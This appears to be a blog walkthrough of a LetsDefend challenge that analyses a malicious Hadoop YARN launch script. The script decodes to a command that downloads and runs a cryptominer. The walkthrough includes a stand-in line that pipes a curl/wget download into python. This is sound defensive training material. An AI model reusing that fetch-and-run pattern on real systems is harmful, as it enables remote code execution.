LetsDefend: Bash Script Challenge Walkthrough

Bash Script Analysis Challenge Using Vim and Apache Hadoop Documentation

9 min read · Dec 2, 2024

Introduction:

Welcome to my weekly walkthrough! If you’ve stumbled across this blog searching for a comprehensive walkthrough of the Bash Script challenge from LetsDefend, you’re in the right place.

In this scenario, our objective is to analyze a suspicious bash script linked to a Hadoop YARN cluster provided by the fictional SOC Team and determine if it’s malicious. For this challenge, we will be using a simple text editor to analyze the script, searching for environment variables set by the script, and comparing them to online documentation. Then, we will analyze a suspicious download command to understand the nature of the attack.

This challenge is beginner-friendly and straightforward, but I had to do a lot of external research to understand Hadoop YARN and the types of threats these services are exposed to. I’ll share this information along the way for some added value. Sounds like fun, right? Let’s get into it!

And hey, if you find this walkthrough helpful — whether it levels-up your skills, gets you over a stumbling block, or serves as a handy reference — please give it a clap! Thanks for reading and going on this investigation with me!

Challenge Link: https://app.letsdefend.io/challenge/log-analysis-with-sysmon

Challenge Scenario:

The SOC team uncovered a suspicious bash script linked to a critical Hadoop YARN cluster that handled large-scale data processing. This script was flagged for further investigation by L1 SOC analysts, who suspected it could be a potential breach. You have been tasked to analyze the bash script to uncover its intent.

Question 1: What is the path set to the standard output log file?

From the scenario, we understand that we’ll be analyzing a bash script linked to a Hadoop YARN cluster. Hadoop? YARN? These sound like foreign languages to me! To get oriented and better interpret the script, let’s get some quick context about these terms in case they’re also unfamiliar to you.

Hadoop: The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models.
Hadoop YARN: Apache Hadoop YARN is the resource management and job scheduling technology in the open source Hadoop distributed processing framework. One of Apache Hadoop’s core components, YARN is responsible for allocating system resources to the various applications running in a Hadoop cluster and scheduling tasks to be executed on different cluster nodes.

While we don’t necessarily need to be Hadoop experts, it’s very helpful to understand that YARN is responsible for setting up, managing, and executing tasks for various applications on a cluster of computers.

We can imagine that a bash script might be useful for automating provisioning, setting up environment variables, configuration paths, and executing tasks — but this could also be abused by the bad guys, too. Since we’re told there is something suspicious about the sample script, it might indicate a potential breach of the application container environment. Let’s find out for ourselves!

Now that we have the theory out of the way, let’s finally extract the ChallengeFile, sample.7z, and open the resulting file (sample) with a text editor. For the examples in this walkthrough, I’ll be using Vim.

To find the answer to Question 1, we’ll focus on the PRELAUNCH_OUT environment variable, which defines the standard output (stdout) path for the container’s pre-launch logs. As the name implies, these pre-launch logs capture the commands executed by the setup script on the container before the application launches.
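If you would rather search than scroll, grep can do the same job as typing /PRELAUNCH_OUT in Vim. The sketch below is only an illustration: it builds a small stand-in file (the paths in it are placeholders, not the challenge answer) and assumes the real script assigns the variable with a line of the form export NAME="value". The find_export helper is a name I made up for this example.

```shell
#!/usr/bin/env bash
# Stand-in for the challenge file; the values are placeholders, not the real answer.
demo_script="$(mktemp)"
cat > "$demo_script" <<'EOF'
#!/bin/bash
export PRELAUNCH_OUT="/placeholder/logs/prelaunch.out"
export PRELAUNCH_ERR="/placeholder/logs/prelaunch.err"
EOF

# find_export NAME FILE: print "line-number:line" for each export of NAME in FILE.
find_export() {
    grep -n -E "^[[:space:]]*export[[:space:]]+$1=" "$2"
}

find_export PRELAUNCH_OUT "$demo_script"
```

Against the real file, you would call find_export PRELAUNCH_OUT sample and read the path from the matching line.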

Question 2: Which environment variable specifies the Java home directory?

Question 2 is more self-explanatory. A few lines further down in the script, we’ll find the JAVA_HOME environment variable, which tells the application where the Java installation’s home directory is.

Question 3: What is the value of the “NM_HTTP_PORT” environment variable?

This is another self-explanatory one. We just need to find the NM_HTTP_PORT environment variable in the script.

Since I’m not familiar with NM, though, let’s do some research to understand it more. According to the Hadoop Documentation, NM stands for NodeManager. It’s a component of YARN that is responsible for managing individual nodes in the cluster. So, this environment variable is specifying the port (8042) where the web interface is accessible to retrieve data about a node’s status. Cool stuff!

Question 4: What directory is set as the “LOCAL_DIRS” environment variable?

For Question 4, let’s find the LOCAL_DIRS environment variable. In the bash script, this variable specifies the local directories on a node where YARN can store temporary files and logs during the execution of applications.
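Since Questions 1 through 4 all come down to reading export lines, it can be handy to pull the four values out in one pass. This is a rough sketch under the same assumption as before (plain export NAME="value" lines). The export_value helper is hypothetical, and apart from the 8042 port mentioned above, every value in the stand-in file is a placeholder. Lines that use shell defaults such as ${VAR:-...} would be printed unexpanded.

```shell
#!/usr/bin/env bash
# export_value NAME FILE: print the value of the first `export NAME=...` line in FILE.
export_value() {
    grep -E "^[[:space:]]*export[[:space:]]+$1=" "$2" | head -n 1 | cut -d= -f2- | tr -d '"'
}

# Stand-in file; apart from the 8042 port, the values are placeholders.
demo_script="$(mktemp)"
cat > "$demo_script" <<'EOF'
export PRELAUNCH_OUT="/placeholder/prelaunch.out"
export JAVA_HOME="/placeholder/java"
export NM_HTTP_PORT="8042"
export LOCAL_DIRS="/placeholder/local-dirs"
EOF

# Print a small NAME = VALUE summary for the variables the questions ask about.
for name in PRELAUNCH_OUT JAVA_HOME NM_HTTP_PORT LOCAL_DIRS; do
    printf '%s = %s\n' "$name" "$(export_value "$name" "$demo_script")"
done
```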

Question 5: The script executes a line at the end of it. What is it?

All right, now we’re done looking for environment variables and starting to analyze some suspicious activity. At the bottom of the script, we’ll see the command below, followed by some parameters:

exec /bin/bash -c

With the use of curl, wget, and lwp-download, we get the idea that this command quietly tries a few different methods to download a file from a remote server. For the purposes of Question 5, we must understand what the line at the end of the script is doing. The catch is that the final command is encoded, but that’s no problem!

We can use a tool like CyberChef to decode it, or do it directly from the terminal:
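Here is a minimal sketch of the terminal route, assuming the string is Base64-encoded (the usual suspect when a script pipes a long blob of letters and digits into a decoder). The encoded value below is a harmless stand-in I generated myself, not the one from the challenge file, and base64 -d is the GNU coreutils spelling of the decode flag.

```shell
#!/usr/bin/env bash
# Harmless stand-in for the encoded string; it is NOT taken from the challenge file.
encoded='ZWNobyBoZWxsbw=='

# Decode only. Never pipe the result into bash while analyzing a sample.
decoded="$(printf '%s' "$encoded" | base64 -d)"
printf '%s\n' "$decoded"
```

The point of stopping at the decode step is that we get to read the command as text without running it.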

Once we have decoded the command, we’ll ultimately discover that the script downloads and executes a Python-based payload — d.py.
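The "try a few different downloaders" behavior mentioned earlier relies on the shell’s || operator: each command runs only if the one before it exits with a failure. The sketch below shows that mechanism with three hypothetical stand-in functions, so nothing is actually downloaded. The function names are mine, not from the sample.

```shell
#!/usr/bin/env bash
# Hypothetical stand-ins for the three downloaders; nothing is fetched.
try_curl() { return 1; }                  # pretend curl is missing or fails
try_wget() { echo "fetched with wget"; }  # pretend wget succeeds
try_lwp()  { echo "fetched with lwp-download"; }

# Each command runs only if the one before it failed (non-zero exit status).
result="$(try_curl || try_wget || try_lwp)"
echo "$result"
```

Because the second attempt succeeds, the third one never runs. For an attacker, this simply raises the odds that at least one tool is installed on the victim host.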

Question 6: Which command is used to create a copy of the launch script?

Let’s take a step back and search the script for a command that creates a copy of the launch script. With little effort, we can find the following line in the script, which is conveniently commented. The copy (cp) command is being used to copy the launch_container.sh script — interesting…

#Creating copy of the launch script
cp "launch_container.sh" "/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/launch_container.sh"

Question 7: What command is executed to determine the directory contents?

Another helpful comment points us to the correct location to look for the answer to Question 7. Here we’ll observe that the ls -l command is used to list the directory contents with the long listing format:

# Determining directory contents
echo "ls -l:" 1>"/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/directory.info"
ls -l 1>>"/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/directory.info"
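If the 1> and 1>> in those two lines look unfamiliar: the 1 is the file descriptor for stdout, > truncates the target file before writing, and >> appends to it. The sketch below replays the same pattern against a scratch file, which stands in for directory.info.

```shell
#!/usr/bin/env bash
# Scratch file standing in for directory.info.
info_file="$(mktemp)"

echo "old contents" > "$info_file"   # pre-existing data
echo "ls -l:" 1> "$info_file"        # 1> truncates, so only the header remains
ls -l 1>> "$info_file"               # 1>> appends the listing after the header

cat "$info_file"
```

The result is a file that starts with the "ls -l:" header followed by the directory listing, with nothing left of the earlier contents.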

Question 8: What IP address is used for downloading a script from the remote server?

We’ve made it to the last question, and it looks familiar, doesn’t it? Remember back in Question 5, we found a script being downloaded and executed. Let’s refer back to that line and the IP Address from where the script was downloaded:
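If you want to pull the address out from the terminal, a pattern search works well. This is a sketch on a stand-in command line that I wrote for illustration: 203.0.113.10 is a documentation-only address (RFC 5737), not the challenge answer, and the regular expression only checks for the dotted-quad shape rather than validating the address.

```shell
#!/usr/bin/env bash
# Stand-in command line; 203.0.113.10 is a documentation-only address, not the challenge answer.
sample_line='(curl -s http://203.0.113.10/d.py || wget -q -O - http://203.0.113.10/d.py) | python'

# Pull out anything shaped like a dotted-quad IPv4 address and de-duplicate.
ips="$(printf '%s\n' "$sample_line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u)"
echo "$ips"
```

Running the same grep against the decoded command from Question 5 should surface the address the challenge is asking for.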

Awesome, we’ve found the answer! Feel free to submit it and wrap up this challenge.

But if you’re interested and want to understand this attack in more detail, I’m going on a side quest to research further by consulting some external threat intelligence to understand exactly what is going on.

Question 8 — Side Quest:

While outside the scope of the challenge, if you want to gain a better understanding of the attack, let’s pivot to VirusTotal and search for the IP Address we found.

On VirusTotal, there are a couple of hits, but we want to focus on the Relations tab > Files Referring section. With a quick scan, you’ll notice something familiar from Question 5 — d.py, the payload downloaded and executed by the script.

Clicking on this entry, we’ll see that this is classified as a crypto miner.

Next, let’s head back to the VirusTotal page for the IP Address and navigate to Details > Google Results to find some external research. Check out one of the linked articles from Trend Micro, as it references the malicious IP.

Threat Actors Exploit Misconfigured Apache Hadoop YARN (www.trendmicro.com)

In summary, the report reveals how threat actors exploit misconfigured Apache Hadoop YARN services to deploy cryptojacking miner malware onto their targets.

As cryptojacking malware is known to be one of the dominant and common payloads for Linux environments, it is no surprise that they were deployed in the YARN service as well…
…At the onset of the attack, the threat actors send commands to the exposed service via an HTTP POST request. As an unintended response, the YARN then creates a launch script that incorporates the attackers’ commands.

Between the VirusTotal report for d.py and the Trend Micro research linking the IP we found to cryptojacking attacks, we now have a better understanding of how the malicious script works and the attacker’s goal. Great job!

Conclusion:

There we have it: script analyzed! During our investigation, we analyzed a bash script using Vim. This helped us understand some of the functions and environment variables of Hadoop YARN. We discovered some suspicious commands executed by the script, which included downloading and executing a script from a remote server. By pivoting to external research, we identified indicators of compromise and determined that the attacker likely performed a cryptojacking attack on the server. Now that we have scoped the attack and completed our objectives, let’s close out this walkthrough of the Bash Script challenge.

A big thank you to LetsDefend for the fun lab scenario. This was interesting to me because, while the answers were straightforward, I realized I had no context or understanding of what was actually happening in the script. I decided to write this up to learn about Hadoop YARN and interpret the results to shape a theory about the attack, rather than just check answers off a list. I hope that the additional research helped you, too!

Thanks for the support and for going through this investigation with me. Remember, if you found this walkthrough helpful, don’t forget to give it a clap! Your feedback really is invaluable and helps fuel my commitment to support your journey in the security community. Cybersecurity is a team sport and we’re in this together!

Until next week’s challenge — stay curious and be safe out there!